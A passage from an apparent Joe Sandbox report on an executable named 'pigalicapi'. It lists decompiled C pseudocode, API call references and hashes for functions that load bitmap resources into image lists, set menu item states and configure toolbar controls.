                                                                                                                                                                                                                                                                                          										E0080A480( &_v20);
                                                                                                                                                                                                                                                                                          										goto L11;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t66 =  *0x880c0c;
                                                                                                                                                                                                                                                                                          								 *(__edi + 0x85) =  *(__edi + 0x85) ^ ((_t89 & 0xffffff00 |  *((short*)(LockResource(LoadResource(_t66, FindResourceA(_t66, _a4, 2))) + 0xe)) == 0x00000020) << 0x00000005 ^  *(__edi + 0x85)) & 0x00000020;
                                                                                                                                                                                                                                                                                          								if(E00811660( *(_t73 + 6) & 0x0000ffff, __edi) == 0) {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L5;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x0080da60
                                                                                                                                                                                                                                                                                          0x0080da63
                                                                                                                                                                                                                                                                                          0x0080da65
                                                                                                                                                                                                                                                                                          0x0080da70
                                                                                                                                                                                                                                                                                          0x0080da76
                                                                                                                                                                                                                                                                                          0x0080da7d
                                                                                                                                                                                                                                                                                          0x0080da81
                                                                                                                                                                                                                                                                                          0x0080da8a
                                                                                                                                                                                                                                                                                          0x0080da97
                                                                                                                                                                                                                                                                                          0x0080da9f
                                                                                                                                                                                                                                                                                          0x0080db9f
                                                                                                                                                                                                                                                                                          0x0080dba4
                                                                                                                                                                                                                                                                                          0x0080dbb1
                                                                                                                                                                                                                                                                                          0x0080daa5
                                                                                                                                                                                                                                                                                          0x0080daa7
                                                                                                                                                                                                                                                                                          0x0080daaf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080dab5
                                                                                                                                                                                                                                                                                          0x0080dabc
                                                                                                                                                                                                                                                                                          0x0080dac0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080dac6
                                                                                                                                                                                                                                                                                          0x0080dac6
                                                                                                                                                                                                                                                                                          0x0080dace
                                                                                                                                                                                                                                                                                          0x0080dad1
                                                                                                                                                                                                                                                                                          0x0080dada
                                                                                                                                                                                                                                                                                          0x0080dadd
                                                                                                                                                                                                                                                                                          0x0080dae6
                                                                                                                                                                                                                                                                                          0x0080db34
                                                                                                                                                                                                                                                                                          0x0080db34
                                                                                                                                                                                                                                                                                          0x0080db42
                                                                                                                                                                                                                                                                                          0x0080db71
                                                                                                                                                                                                                                                                                          0x0080db77
                                                                                                                                                                                                                                                                                          0x0080db7a
                                                                                                                                                                                                                                                                                          0x0080db44
                                                                                                                                                                                                                                                                                          0x0080db60
                                                                                                                                                                                                                                                                                          0x0080db62
                                                                                                                                                                                                                                                                                          0x0080db62
                                                                                                                                                                                                                                                                                          0x0080db7e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080db80
                                                                                                                                                                                                                                                                                          0x0080db95
                                                                                                                                                                                                                                                                                          0x0080dbb4
                                                                                                                                                                                                                                                                                          0x0080dbb9
                                                                                                                                                                                                                                                                                          0x0080dbbb
                                                                                                                                                                                                                                                                                          0x0080dbbe
                                                                                                                                                                                                                                                                                          0x0080dbc1
                                                                                                                                                                                                                                                                                          0x0080dbc5
                                                                                                                                                                                                                                                                                          0x0080dbca
                                                                                                                                                                                                                                                                                          0x0080dbcf
                                                                                                                                                                                                                                                                                          0x0080dbcf
                                                                                                                                                                                                                                                                                          0x0080dbd2
                                                                                                                                                                                                                                                                                          0x0080dbd5
                                                                                                                                                                                                                                                                                          0x0080dbd5
                                                                                                                                                                                                                                                                                          0x0080dbd5
                                                                                                                                                                                                                                                                                          0x0080dbc1
                                                                                                                                                                                                                                                                                          0x0080dbde
                                                                                                                                                                                                                                                                                          0x0080dbe4
                                                                                                                                                                                                                                                                                          0x0080dbe8
                                                                                                                                                                                                                                                                                          0x0080dc05
                                                                                                                                                                                                                                                                                          0x0080dc13
                                                                                                                                                                                                                                                                                          0x0080dc20
                                                                                                                                                                                                                                                                                          0x0080dbea
                                                                                                                                                                                                                                                                                          0x0080dbea
                                                                                                                                                                                                                                                                                          0x0080dbf5
                                                                                                                                                                                                                                                                                          0x0080dc02
                                                                                                                                                                                                                                                                                          0x0080dc02
                                                                                                                                                                                                                                                                                          0x0080db97
                                                                                                                                                                                                                                                                                          0x0080db9a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080db9a
                                                                                                                                                                                                                                                                                          0x0080db95
                                                                                                                                                                                                                                                                                          0x0080dae8
                                                                                                                                                                                                                                                                                          0x0080daeb
                                                                                                                                                                                                                                                                                          0x0080db21
                                                                                                                                                                                                                                                                                          0x0080db32
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080db32
                                                                                                                                                                                                                                                                                          0x0080dae6
                                                                                                                                                                                                                                                                                          0x0080dac0
                                                                                                                                                                                                                                                                                          0x0080daaf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(00800000,00807D7D,000000F1), ref: 0080DA97
                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(00800000,00000000,?,00000000,?,00807D7D,00000080), ref: 0080DAA7
                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,00000000,?,00807D7D,00000080), ref: 0080DAB6
                                                                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(00800000,00807D7D,00000002), ref: 0080DAF6
                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(00800000,00000000,?,00000000,?,00807D7D,00000080), ref: 0080DAFE
                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,00000000,?,00807D7D,00000080), ref: 0080DB05
                                                                                                                                                                                                                                                                                            • Part of subcall function 00811660: ImageList_Create.COMCTL32(?,?,00000000,?,00000001,?,?,?,?,?,?,?,?,0080DB30,?,00000000), ref: 0081168B
                                                                                                                                                                                                                                                                                          • LoadImageA.USER32 ref: 0080DB5A
                                                                                                                                                                                                                                                                                          • LoadBitmapA.USER32 ref: 0080DB71
                                                                                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00807D7D), ref: 0080DB8C
                                                                                                                                                                                                                                                                                          • ImageList_GetImageCount.COMCTL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00807D7D), ref: 0080DBDE
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0080DBEA
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0080DC05
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080DA00: ImageList_GetImageCount.COMCTL32(?,?,00000000,0080DAE2,?,00000000,?,00807D7D,00000080), ref: 0080DA0E
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080DA00: ImageList_Destroy.COMCTL32(?,?,00000000,?,00807D7D,00000080), ref: 0080DA1C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Image$Resource$List_$Load$CountDeleteFindLockObject$BitmapCreateDestroyMasked
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3830000767-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 92bb2bf4fb9b77e5e3ef55ae4be0f8a72038b039c37c959464a4f23d8c50263e
                                                                                                                                                                                                                                                                                          • Instruction ID: 934a6ef7255cc30c5db8f0de4aa7a0017b7fc517ad5396fdb59235c0479d593a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92bb2bf4fb9b77e5e3ef55ae4be0f8a72038b039c37c959464a4f23d8c50263e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21518071A00715AFDB60DFA8DC89BAAB7B8FF08721F118155ED05E72D1DB75A840CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			E008051B0(struct HMENU__* __ebx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                                                                          				signed short* _v172;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v220;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v268;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                                                                                                          				signed short* _t78;
                                                                                                                                                                                                                                                                                          				int _t92;
                                                                                                                                                                                                                                                                                          				signed short* _t93;
                                                                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t77 = __ebx;
                                                                                                                                                                                                                                                                                          				_t55 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v12 = _t55 ^ _t94;
                                                                                                                                                                                                                                                                                          				_t57 = _a4;
                                                                                                                                                                                                                                                                                          				_t93 =  *(_t57 + 0x10);
                                                                                                                                                                                                                                                                                          				if(_t93 != 0) {
                                                                                                                                                                                                                                                                                          					_t78 =  *(_t57 + 0xc);
                                                                                                                                                                                                                                                                                          					_t58 =  *_t78 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					_t88 = 0xffff;
                                                                                                                                                                                                                                                                                          					_v172 = _t78;
                                                                                                                                                                                                                                                                                          					while(_t58 != 0xffff) {
                                                                                                                                                                                                                                                                                          						if((_t78[1] & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          							_t92 = _t58 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							if(( *_t93 & 0x00004000) != 0) {
                                                                                                                                                                                                                                                                                          								SetMenuDefaultItem(_t77, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          								 *_t93 =  *_t93 & 0x0000bfff;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E00816820( &_v220, 0, 0x30);
                                                                                                                                                                                                                                                                                          							_v220.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          							E00816820( &(_v168.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          							_t95 = _t95 + 0x18;
                                                                                                                                                                                                                                                                                          							_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          							if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                                                                                                          								_v220.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t73 = _v168.dwMajorVersion;
                                                                                                                                                                                                                                                                                          								if(_t73 < 5 && (_t73 != 4 || _v168.dwMinorVersion < 0x5a)) {
                                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t66 =  *_t93 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							_v220.fMask = 1;
                                                                                                                                                                                                                                                                                          							_v220.wID = _t92;
                                                                                                                                                                                                                                                                                          							if((_t66 & 0x00000100) != 0) {
                                                                                                                                                                                                                                                                                          								_v220.fState = _v220.fState | 0x00000003;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if((_t66 & 0x00000200) != 0) {
                                                                                                                                                                                                                                                                                          								_v220.fState = _v220.fState | 0x00000008;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if((_t66 & 0x00001000) != 0) {
                                                                                                                                                                                                                                                                                          								_v220.fState = _v220.fState | 0x00001000;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if((_t66 & 0x00002000) != 0) {
                                                                                                                                                                                                                                                                                          								E00816820( &_v268, 0, 0x30);
                                                                                                                                                                                                                                                                                          								_t95 = _t95 + 0xc;
                                                                                                                                                                                                                                                                                          								_v268.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          								if(E00804890(_t77, _t92, _t93) != 0) {
                                                                                                                                                                                                                                                                                          									_v268.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v268.fMask = 0x10;
                                                                                                                                                                                                                                                                                          								_v268.wID = _t92;
                                                                                                                                                                                                                                                                                          								if(GetMenuItemInfoA(_t77, _t92, 0,  &_v268) != 0) {
                                                                                                                                                                                                                                                                                          									_v220.fMask = _v220.fMask | 0x00000010;
                                                                                                                                                                                                                                                                                          									_v220.fType = _v220.fType | _v268.fType & 0xfffff7fb;
                                                                                                                                                                                                                                                                                          									_v220.dwTypeData = _t93[2];
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							SetMenuItemInfoA(_t77, _t92, 0,  &_v220);
                                                                                                                                                                                                                                                                                          							_t78 = _v172;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t58 = _t78[2] & 0x0000ffff;
                                                                                                                                                                                                                                                                                          						_t78 =  &(_t78[2]);
                                                                                                                                                                                                                                                                                          						_t88 = 0xffff;
                                                                                                                                                                                                                                                                                          						_t93 =  &(_t93[4]);
                                                                                                                                                                                                                                                                                          						_v172 = _t78;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t77, _v12 ^ _t94, _t88, _t92, _t93);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E008159E6( &(_t93[0]), __ebx, _v12 ^ _t94, __edx, _t92, _t93);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                                          0x008051b0
                                                                                                                                                                                                                                                                                          0x008051b9
                                                                                                                                                                                                                                                                                          0x008051c0
                                                                                                                                                                                                                                                                                          0x008051c3
                                                                                                                                                                                                                                                                                          0x008051c7
                                                                                                                                                                                                                                                                                          0x008051cd
                                                                                                                                                                                                                                                                                          0x008051e4
                                                                                                                                                                                                                                                                                          0x008051e7
                                                                                                                                                                                                                                                                                          0x008051ea
                                                                                                                                                                                                                                                                                          0x008051ef
                                                                                                                                                                                                                                                                                          0x008051f8
                                                                                                                                                                                                                                                                                          0x00805202
                                                                                                                                                                                                                                                                                          0x00805208
                                                                                                                                                                                                                                                                                          0x00805213
                                                                                                                                                                                                                                                                                          0x0080521a
                                                                                                                                                                                                                                                                                          0x00805225
                                                                                                                                                                                                                                                                                          0x00805225
                                                                                                                                                                                                                                                                                          0x00805233
                                                                                                                                                                                                                                                                                          0x00805249
                                                                                                                                                                                                                                                                                          0x00805253
                                                                                                                                                                                                                                                                                          0x00805258
                                                                                                                                                                                                                                                                                          0x00805262
                                                                                                                                                                                                                                                                                          0x00805274
                                                                                                                                                                                                                                                                                          0x0080528f
                                                                                                                                                                                                                                                                                          0x0080528f
                                                                                                                                                                                                                                                                                          0x00805276
                                                                                                                                                                                                                                                                                          0x00805276
                                                                                                                                                                                                                                                                                          0x0080527f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080527f
                                                                                                                                                                                                                                                                                          0x00805299
                                                                                                                                                                                                                                                                                          0x0080529c
                                                                                                                                                                                                                                                                                          0x008052a6
                                                                                                                                                                                                                                                                                          0x008052b1
                                                                                                                                                                                                                                                                                          0x008052b3
                                                                                                                                                                                                                                                                                          0x008052b3
                                                                                                                                                                                                                                                                                          0x008052bf
                                                                                                                                                                                                                                                                                          0x008052c1
                                                                                                                                                                                                                                                                                          0x008052c1
                                                                                                                                                                                                                                                                                          0x008052cd
                                                                                                                                                                                                                                                                                          0x008052cf
                                                                                                                                                                                                                                                                                          0x008052cf
                                                                                                                                                                                                                                                                                          0x008052de
                                                                                                                                                                                                                                                                                          0x008052eb
                                                                                                                                                                                                                                                                                          0x008052f0
                                                                                                                                                                                                                                                                                          0x008052f3
                                                                                                                                                                                                                                                                                          0x00805304
                                                                                                                                                                                                                                                                                          0x00805306
                                                                                                                                                                                                                                                                                          0x00805306
                                                                                                                                                                                                                                                                                          0x0080531b
                                                                                                                                                                                                                                                                                          0x00805325
                                                                                                                                                                                                                                                                                          0x00805333
                                                                                                                                                                                                                                                                                          0x0080533e
                                                                                                                                                                                                                                                                                          0x0080534b
                                                                                                                                                                                                                                                                                          0x00805351
                                                                                                                                                                                                                                                                                          0x00805351
                                                                                                                                                                                                                                                                                          0x00805333
                                                                                                                                                                                                                                                                                          0x00805362
                                                                                                                                                                                                                                                                                          0x00805368
                                                                                                                                                                                                                                                                                          0x00805368
                                                                                                                                                                                                                                                                                          0x0080536e
                                                                                                                                                                                                                                                                                          0x00805372
                                                                                                                                                                                                                                                                                          0x00805375
                                                                                                                                                                                                                                                                                          0x0080537a
                                                                                                                                                                                                                                                                                          0x0080537d
                                                                                                                                                                                                                                                                                          0x00805383
                                                                                                                                                                                                                                                                                          0x0080539d
                                                                                                                                                                                                                                                                                          0x008051cf
                                                                                                                                                                                                                                                                                          0x008051e1
                                                                                                                                                                                                                                                                                          0x008051e1

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0080521A
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00805233
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00805253
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?), ref: 0080526C
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 008052EB
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 0080532B
                                                                                                                                                                                                                                                                                          • SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 00805362
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ItemMenu_memset$Info$DefaultVersion
                                                                                                                                                                                                                                                                                          • String ID: ,$,$Z
                                                                                                                                                                                                                                                                                          • API String ID: 3121610409-2789403577
                                                                                                                                                                                                                                                                                          • Opcode ID: 87653e6cf9aef670de00631c0cf9d622df209adf92baa20d54b8c9aa4551fdc5
                                                                                                                                                                                                                                                                                          • Instruction ID: a9761af45ac85ba4a462c531686d81dbfcecca94dc59a545ee8878b9b91f70ef
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87653e6cf9aef670de00631c0cf9d622df209adf92baa20d54b8c9aa4551fdc5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51CF71A002189BEB74CF14DC45BEAB7B8FF45700F1480A9E989E62C1D7B09AC4CF61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E0080D0D0(struct HWND__* __esi, struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                                          				int _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v76;
                                                                                                                                                                                                                                                                                          				int _v88;
                                                                                                                                                                                                                                                                                          				signed int _v100;
                                                                                                                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                                                                                                                          				void* _v108;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                                                                                                          				int _t53;
                                                                                                                                                                                                                                                                                          				int _t66;
                                                                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t82;
                                                                                                                                                                                                                                                                                          				signed int _t83;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t82 = __esi;
                                                                                                                                                                                                                                                                                          				_t43 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t43 ^ _t83;
                                                                                                                                                                                                                                                                                          				_t81 = SendMessageA;
                                                                                                                                                                                                                                                                                          				_v28 = _a4;
                                                                                                                                                                                                                                                                                          				_t66 = SendMessageA(__esi, 0x418, 0, 0);
                                                                                                                                                                                                                                                                                          				_v108 = 0x50;
                                                                                                                                                                                                                                                                                          				E00816820( &_v104, 0, 0x4c);
                                                                                                                                                                                                                                                                                          				_v104 = 0x371;
                                                                                                                                                                                                                                                                                          				_v100 = 4;
                                                                                                                                                                                                                                                                                          				if(_t66 > 0) {
                                                                                                                                                                                                                                                                                          					_v100 = 0x204;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_a8 != 0) {
                                                                                                                                                                                                                                                                                          					_v100 = _v100 | 0x00000001;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v88 = 0;
                                                                                                                                                                                                                                                                                          				_v76 = _t82;
                                                                                                                                                                                                                                                                                          				_v56 = SendMessageA(_v28, 0x40c, 0, 0) + 0xeb00;
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                                                                          				if(_t66 <= 0) {
                                                                                                                                                                                                                                                                                          					GetWindowRect(_t82,  &_v24);
                                                                                                                                                                                                                                                                                          					_t53 = _v16 - _v24;
                                                                                                                                                                                                                                                                                          					_v64 = _t53;
                                                                                                                                                                                                                                                                                          					_v72 = 0;
                                                                                                                                                                                                                                                                                          					_v68 = _v12 - _v20;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					SendMessageA(_t82, 0x41d, _t66,  &_v24);
                                                                                                                                                                                                                                                                                          					_v64 = _v16;
                                                                                                                                                                                                                                                                                          					_v68 = _v12 - _v20;
                                                                                                                                                                                                                                                                                          					SendMessageA(_t82, 0x41d, 0,  &_v24);
                                                                                                                                                                                                                                                                                          					_t53 = _v64;
                                                                                                                                                                                                                                                                                          					_v72 = _v16;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v40 = _t53;
                                                                                                                                                                                                                                                                                          				if(SendMessageA(_v28, 0x401, 0xffffffff,  &_v108) != 0) {
                                                                                                                                                                                                                                                                                          					SendMessageA(_t82, 0x454, 0, SendMessageA(_t82, 0x455, 0, 0) | 0x00000010);
                                                                                                                                                                                                                                                                                          					return E008159E6(1, _t66, _v8 ^ _t83,  &_v108, _t81, _t82);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E008159E6(_t55, _t66, _v8 ^ _t83,  &_v108, _t81, _t82);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                                          0x0080d0d0
                                                                                                                                                                                                                                                                                          0x0080d0d6
                                                                                                                                                                                                                                                                                          0x0080d0dd
                                                                                                                                                                                                                                                                                          0x0080d0e5
                                                                                                                                                                                                                                                                                          0x0080d0f5
                                                                                                                                                                                                                                                                                          0x0080d102
                                                                                                                                                                                                                                                                                          0x0080d104
                                                                                                                                                                                                                                                                                          0x0080d10b
                                                                                                                                                                                                                                                                                          0x0080d113
                                                                                                                                                                                                                                                                                          0x0080d11a
                                                                                                                                                                                                                                                                                          0x0080d123
                                                                                                                                                                                                                                                                                          0x0080d125
                                                                                                                                                                                                                                                                                          0x0080d125
                                                                                                                                                                                                                                                                                          0x0080d130
                                                                                                                                                                                                                                                                                          0x0080d132
                                                                                                                                                                                                                                                                                          0x0080d132
                                                                                                                                                                                                                                                                                          0x0080d143
                                                                                                                                                                                                                                                                                          0x0080d14a
                                                                                                                                                                                                                                                                                          0x0080d154
                                                                                                                                                                                                                                                                                          0x0080d159
                                                                                                                                                                                                                                                                                          0x0080d15c
                                                                                                                                                                                                                                                                                          0x0080d15f
                                                                                                                                                                                                                                                                                          0x0080d162
                                                                                                                                                                                                                                                                                          0x0080d167
                                                                                                                                                                                                                                                                                          0x0080d1a4
                                                                                                                                                                                                                                                                                          0x0080d1ad
                                                                                                                                                                                                                                                                                          0x0080d1b6
                                                                                                                                                                                                                                                                                          0x0080d1b9
                                                                                                                                                                                                                                                                                          0x0080d1c0
                                                                                                                                                                                                                                                                                          0x0080d169
                                                                                                                                                                                                                                                                                          0x0080d175
                                                                                                                                                                                                                                                                                          0x0080d18c
                                                                                                                                                                                                                                                                                          0x0080d18f
                                                                                                                                                                                                                                                                                          0x0080d192
                                                                                                                                                                                                                                                                                          0x0080d197
                                                                                                                                                                                                                                                                                          0x0080d19a
                                                                                                                                                                                                                                                                                          0x0080d19a
                                                                                                                                                                                                                                                                                          0x0080d1c9
                                                                                                                                                                                                                                                                                          0x0080d1d9
                                                                                                                                                                                                                                                                                          0x0080d203
                                                                                                                                                                                                                                                                                          0x0080d219
                                                                                                                                                                                                                                                                                          0x0080d1dd
                                                                                                                                                                                                                                                                                          0x0080d1ea
                                                                                                                                                                                                                                                                                          0x0080d1ea

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
